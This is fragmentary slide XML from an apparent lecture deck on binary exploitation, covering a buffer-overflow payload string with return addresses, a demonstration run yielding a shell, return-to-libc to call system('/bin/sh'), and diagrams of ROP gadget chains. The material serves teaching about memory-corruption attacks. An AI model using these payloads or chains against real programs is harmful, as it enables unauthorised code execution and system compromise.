              <a:rPr b="1"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"A" * 140 + "\x80\xfd\xe3\xf7" + "\xb0\x39\xe3\xf7" + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400" u="sng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"\x79\x8d\x04\x08"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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+ "\0\0\0\0"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argv[1]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��9y�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id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uid=1000(user) gid=1000(user) groups=1000(user),27(sudo)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147975" y="1362300"/>
            <a:ext cx="2899500" cy="1715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machine code get executed?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677150" y="1603225"/>
            <a:ext cx="10119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677150" y="2350350"/>
            <a:ext cx="10119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Codes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403150" y="1917825"/>
            <a:ext cx="1011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Counter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028900" y="1513800"/>
            <a:ext cx="1625400" cy="14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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="141" name="Shape 141"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4047475" y="1917825"/>
            <a:ext cx="983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Shape 142"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="140" idx="1"/>
            <a:endCxn id="135" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4047600" y="2220000"/>
            <a:ext cx="9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Shape 143"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4048675" y="2490525"/>
            <a:ext cx="9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Shape 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4066050" y="1684700"/>
            <a:ext cx="1011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Address</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Shape 145"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4066050" y="1952338"/>
            <a:ext cx="1011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sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Shape 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4115525" y="2232263"/>
            <a:ext cx="1011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Instruction</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Shape 147"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3119850" y="3330650"/>
            <a:ext cx="2684100" cy="152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sum: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push ebp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mov ebp, esp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	mov eax, [ebp+12]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	add eax, [ebp+8]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	pop ebp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	ret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8" name="Shape 148"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="147" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787750" y="4085300"/>
            <a:ext cx="332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Shape 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2272425" y="3871700"/>
            <a:ext cx="515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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="150" name="Shape 150"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2784375" y="3856100"/>
            <a:ext cx="332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1" name="Shape 151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2268975" y="3642500"/>
            <a:ext cx="515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Rethink about return to libc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1570" name="Shape 1570"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="215650" y="1421575"/>
            <a:ext cx="24927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use return to libc attack to run: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system("/bin/sh")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exit(0)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system() and exit() are both code segments that end with "ret"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about other code segments?Like small pieces of code.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1571" name="Shape 1571"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2806450" y="1421563"/>
            <a:ext cx="5941375" cy="3528125"/>
            <a:chOff x="2123700" y="1432938"/>
            <a:chExt cx="5941375" cy="3528125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1572" name="Shape 1572"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5329875" y="1927450"/>
              <a:ext cx="1571400" cy="307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"/bin/sh"</a:t>
              </a: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29875" y="2234650"/>
              <a:ext cx="1571400" cy="307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exit</a:t>
              </a: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29875" y="2541850"/>
              <a:ext cx="1571400" cy="307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system</a:t>
              </a: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29875" y="2849050"/>
              <a:ext cx="1571400" cy="307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padding</a:t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29875" y="3156250"/>
              <a:ext cx="1571400" cy="12201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padding</a:t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29875" y="1620250"/>
              <a:ext cx="1571400" cy="307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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1578" name="Shape 1578"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="7103550" y="1581900"/>
              <a:ext cx="15900" cy="2730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9" name="Shape 1579"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7177375" y="2707075"/>
              <a:ext cx="8877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Overflow</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1580" name="Shape 1580"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2123700" y="1432938"/>
              <a:ext cx="2162100" cy="1584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exit:</a:t>
              </a:r>
              <a:endPara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push ebp</a:t>
              </a:r>
              <a:endParaRPr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mov ebp, esp</a:t>
              </a:r>
              <a:endParaRPr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ret</a:t>
              </a:r>
              <a:endParaRPr b="1"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Shape 1581"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2123700" y="3376163"/>
              <a:ext cx="2162100" cy="1584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system:</a:t>
              </a:r>
              <a:endPara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push ebp</a:t>
              </a:r>
              <a:endParaRPr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mov ebp, esp</a:t>
              </a:r>
              <a:endParaRPr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...(execute command)</a:t>
              </a:r>
              <a:endParaRPr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ret</a:t>
              </a:r>
              <a:endParaRPr b="1"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2" name="Shape 1582"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="1574" idx="1"/>
              <a:endCxn id="1581" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4285875" y="2695450"/>
              <a:ext cx="1044000" cy="1473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3" name="Shape 1583"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="1573" idx="1"/>
              <a:endCxn id="1580" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="4285875" y="2225350"/>
              <a:ext cx="1044000" cy="16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4" name="Shape 1584"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="1581" idx="0"/>
              <a:endCxn id="1580" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3204750" y="3017963"/>
              <a:ext cx="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Shape 15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ROP(Return Oriented Programming)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1590" name="Shape 1590"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="3451438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0x08052318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1" name="Shape 1591"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="2878738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0x0c0c0c0c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2" name="Shape 1592"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="2306038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0x0809951f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3" name="Shape 1593"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="1728500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0x080788c1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4" name="Shape 1594"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="3584200"/>
            <a:ext cx="26859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 %edx; ret;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5" name="Shape 1595"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="2418150"/>
            <a:ext cx="26859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xor %eax, %eax; ret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6" name="Shape 1596"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="1861238"/>
            <a:ext cx="26859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%eax, (%edx); ret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7" name="Shape 1597"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371855" y="3291750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598" name="Shape 1598"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6044805" y="3445350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9" name="Shape 1599"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="4172925"/>
            <a:ext cx="2685900" cy="30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stack overflow; ret;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0" name="Shape 1600"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1599" idx="0"/>
            <a:endCxn id="1594" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3401675" y="3891525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1" name="Shape 1601"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1594" idx="0"/>
            <a:endCxn id="1595" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3401675" y="2725300"/>
            <a:ext cx="0" cy="85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2" name="Shape 1602"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1595" idx="0"/>
            <a:endCxn id="1596" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3401675" y="2168550"/>
            <a:ext cx="0" cy="2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3" name="Shape 1603"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1590" idx="1"/>
            <a:endCxn id="1594" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4744600" y="3737788"/>
            <a:ext cx="170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04" name="Shape 1604"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1592" idx="1"/>
            <a:endCxn id="1595" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4744600" y="2571688"/>
            <a:ext cx="1703400" cy="2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05" name="Shape 1605"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1593" idx="1"/>
            <a:endCxn id="1596" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4744600" y="2014850"/>
            <a:ext cx="170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06" name="Shape 1606"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990605" y="3584195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EIP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1607" name="Shape 1607"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1663555" y="3737795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8" name="Shape 1608"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="1150950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0x41414141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Shape 16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ROP(Return Oriented Programming)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1614" name="Shape 1614"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="3451438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0x08052318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5" name="Shape 1615"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="2878738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6" name="Shape 1616"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="2306038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0x0809951f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7" name="Shape 1617"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="1728500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0x080788c1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8" name="Shape 1618"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="3584200"/>
            <a:ext cx="2685900" cy="30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pop %edx; ret;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9" name="Shape 1619"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="2418150"/>
            <a:ext cx="26859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xor %eax, %eax; ret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0" name="Shape 1620"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="1861238"/>
            <a:ext cx="26859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%eax, (%edx); ret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1" name="Shape 1621"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371855" y="2148750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622" name="Shape 1622"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6044805" y="2302350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3" name="Shape 1623"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="4172925"/>
            <a:ext cx="26859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 overflow; ret;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24" name="Shape 1624"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1623" idx="0"/>
            <a:endCxn id="1618" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3401675" y="3891525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5" name="Shape 1625"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1618" idx="0"/>
            <a:endCxn id="1619" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3401675" y="2725300"/>
            <a:ext cx="0" cy="85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6" name="Shape 1626"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1619" idx="0"/>
            <a:endCxn id="1620" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3401675" y="2168550"/>
            <a:ext cx="0" cy="2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7" name="Shape 1627"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1614" idx="1"/>
            <a:endCxn id="1618" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4744600" y="3737788"/>
            <a:ext cx="170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28" name="Shape 1628"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1616" idx="1"/>
            <a:endCxn id="1619" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4744600" y="2571688"/>
            <a:ext cx="1703400" cy="2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29" name="Shape 1629"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1617" idx="1"/>
            <a:endCxn id="1620" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4744600" y="2014850"/>
            <a:ext cx="170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30" name="Shape 1630"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990605" y="2441195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EIP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1631" name="Shape 1631"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1663555" y="2594795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2" name="Shape 1632"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581875" y="3001175"/>
            <a:ext cx="1623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%edx = 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3" name="Shape 1633"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="1150950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0x41414141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Shape 16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ROP(Return Oriented Programming)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1639" name="Shape 1639"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="3451438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0x08052318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0" name="Shape 1640"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="2878738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1" name="Shape 1641"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="2306038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0x0809951f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2" name="Shape 1642"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="1728500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0x080788c1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3" name="Shape 1643"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="3584200"/>
            <a:ext cx="26859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 %edx; ret;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4" name="Shape 1644"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="2418150"/>
            <a:ext cx="2685900" cy="30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xor %eax, %eax; ret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5" name="Shape 1645"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="1861238"/>
            <a:ext cx="26859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%eax, (%edx); ret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6" name="Shape 1646"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371855" y="1615350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647" name="Shape 1647"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6044805" y="1768950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8" name="Shape 1648"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="4172925"/>
            <a:ext cx="26859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 overflow; ret;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49" name="Shape 1649"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1648" idx="0"/>
            <a:endCxn id="1643" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3401675" y="3891525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0" name="Shape 1650"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1643" idx="0"/>
            <a:endCxn id="1644" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3401675" y="2725300"/>
            <a:ext cx="0" cy="85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1" name="Shape 1651"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1644" idx="0"/>
            <a:endCxn id="1645" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3401675" y="2168550"/>
            <a:ext cx="0" cy="2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2" name="Shape 1652"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1639" idx="1"/>
            <a:endCxn id="1643" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4744600" y="3737788"/>
            <a:ext cx="170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53" name="Shape 1653"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1641" idx="1"/>
            <a:endCxn id="1644" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4744600" y="2571688"/>
            <a:ext cx="1703400" cy="2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54" name="Shape 1654"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1642" idx="1"/>
            <a:endCxn id="1645" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4744600" y="2014850"/>
            <a:ext cx="170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55" name="Shape 1655"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990605" y="1831595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EIP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1656" name="Shape 1656"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1663555" y="1985195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7" name="Shape 1657"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581875" y="3001175"/>
            <a:ext cx="1623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%edx = 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8" name="Shape 1658"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581875" y="2139675"/>
            <a:ext cx="1623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%eax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9" name="Shape 1659"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="1150950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0x41414141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Shape 16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ROP(Return Oriented Programming)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1665" name="Shape 1665"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="3451438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0x08052318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6" name="Shape 1666"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="2878738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6448000" y="2306038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0x0809951f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8" name="Shape 1668"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448000" y="1728500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0x080788c1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9" name="Shape 1669"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="3584200"/>
            <a:ext cx="26859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 %edx; ret;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0" name="Shape 1670"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="2418150"/>
            <a:ext cx="26859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xor %eax, %eax; ret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1" name="Shape 1671"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="1861238"/>
            <a:ext cx="2685900" cy="30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mov %eax, (%edx); ret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2" name="Shape 1672"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371855" y="1005750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673" name="Shape 1673"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6044805" y="1159350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4" name="Shape 1674"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058725" y="4172925"/>
            <a:ext cx="26859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 overflow; ret;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5" name="Shape 1675"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1674" idx="0"/>
            <a:endCxn id="1669" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3401675" y="3891525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6" name="Shape 1676"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1669" idx="0"/>
            <a:endCxn id="1670" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3401675" y="2725300"/>
            <a:ext cx="0" cy="85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7" name="Shape 1677"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1670" idx="0"/>
            <a:endCxn id="1671" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3401675" y="2168550"/>
            <a:ext cx="0" cy="2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8" name="Shape 1678"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1665" idx="1"/>
            <a:endCxn id="1669" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4744600" y="3737788"/>
            <a:ext cx="170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79" name="Shape 1679"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1667" idx="1"/>
            <a:endCxn id="1670" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4744600" y="2571688"/>
            <a:ext cx="1703400" cy="2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80" name="Shape 1680"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1668" idx="1"/>
            <a:endCxn id="1671" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4744600" y="2014850"/>
            <a:ext cx="170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81" name="Shape 1681"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581875" y="3001175"/>
            <a:ext cx="1623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%edx = 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2" name="Shape 1682"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581875" y="2139675"/>
            <a:ext cx="1623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%eax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3" name="Shape 1683"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581875" y="1425100"/>
            <a:ext cx="2287500" cy="30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*(int *)value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84" name="Shape 1684"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1655530" y="1578695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5" name="Shape 1685"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="982580" y="1425095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EIP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1686" name="Shape 1686"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
